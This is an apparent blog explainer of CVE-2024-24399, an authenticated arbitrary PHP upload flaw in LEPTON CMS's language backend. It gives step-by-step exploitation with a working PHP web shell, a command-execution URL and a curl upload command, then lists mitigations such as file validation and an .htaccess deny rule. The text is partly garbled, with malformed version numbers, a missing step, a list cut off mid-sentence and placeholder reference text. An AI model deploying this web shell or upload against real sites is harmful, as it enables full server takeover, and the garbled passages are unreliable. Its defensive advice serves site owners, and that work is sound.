CVE-2024-24399 - Arbitrary File Upload in LEPTON v7.. — Exploiting the Language Backend

Security researchers have discovered a critical vulnerability: CVE-2024-24399 in LEPTON CMS v7... This flaw allows authenticated attackers to upload arbitrary PHP files via the backend language management feature. If the attacker successfully uploads a malicious PHP file, they can execute commands on the server with the same privileges as the web server process—a classic path to a full website takeover.

This long read will give you an exclusive, easy-to-understand overview of the vulnerability, how it works, and how attackers can exploit it, using clear code examples and links to original disclosures.

What Is LEPTON CMS?

LEPTON is an open-source content management system written in PHP. Popular among small businesses and freelancers, it features backend administration that lets users manage site content, themes, languages, and more.

The Language File Upload

LEPTON v7..'s backend provides an interface for uploading new or updated language files at:
backend/languages/index.php

The intent is for administrators to upload .php files containing localization arrays. However, this upload feature does not properly restrict or sanitize uploaded files. Therefore, an authenticated attacker can upload a PHP script disguised as a language file — and then access and execute it.

Step 1: Logging In

An attacker must first log in as an admin. This narrows the attack surface to insiders or stolen credentials.

Step 2: Navigate to Language Upload

Go to:

http(s)://YOUR_LEPTON_SITE/ADMIN_DIRECTORY/languages/index.php

This area allows uploading .php files.

Create a malicious PHP file (for example, a classic web shell)

<?php
if(isset($_REQUEST['cmd'])) {
    echo '<pre>';
    system($_REQUEST['cmd']);
    echo '</pre>';
}
?>

Step 4: Upload via the Language Interface

Use the backend upload interface to upload evil_language.php.

Once uploaded, the attacker can access

http(s)://YOUR_LEPTON_SITE/languages/evil_language.php?cmd=whoami

This URL executes the whoami command on the server. The output is rendered back in the browser.

Code Snippet: Exploit Automation (curl)

You can automate this attack using curl if you have an authenticated session (replace COOKIE with your valid session cookie):

curl -k -b "COOKIE=session_id=YOUR_SESSION" \
     -F "userfile=@evil_language.php;type=application/x-php" \
     https://TARGET_SITE/ADMIN_DIRECTORY/languages/index.php

Why Does This Work?

The backend does not

Move the upload outside public web root

PHP executes any .php file inside /languages/, so an attacker’s code runs immediately when accessed.

Upgrade: If a patched version is available, update ASAP.

- File Type Validation: Restrict file uploads to allow only safe types (e.g., validate the filename/content).

Sanitize & Move: Store uploads outside the web-root when possible, and never trust file content.

- Least Privilege: Restrict backend access to only trusted users and enable two-factor authentication.

Example .htaccess (if using Apache), dropped in /languages/

<FilesMatch "\.php$">
    Deny from all
</FilesMatch>

References & Further Reading

- LEPTON Official Site
- Original Advisory at MITRE (if posted) *(Replace with updated link when published)*
- NVD Entry for CVE-2024-24399
- LEPTON Github Repository
- What is a Web Shell? by OWASP

Conclusion

CVE-2024-24399 is a critical vulnerability in LEPTON CMS v7.. that turns an authenticated language file upload into a server-side backdoor. If you use LEPTON, immediately check your version and update. Restrict backend access, audit uploaded files, and secure your server. Attackers need only basic PHP skills and backend access to completely compromise vulnerable sites.

If you’re responsible for a LEPTON deployment, check your /languages/ directory for suspicious files — and patch now!

Timeline

Published on: 01/25/2024 21:15:09 UTC
Last modified on: 04/01/2024 04:15:10 UTC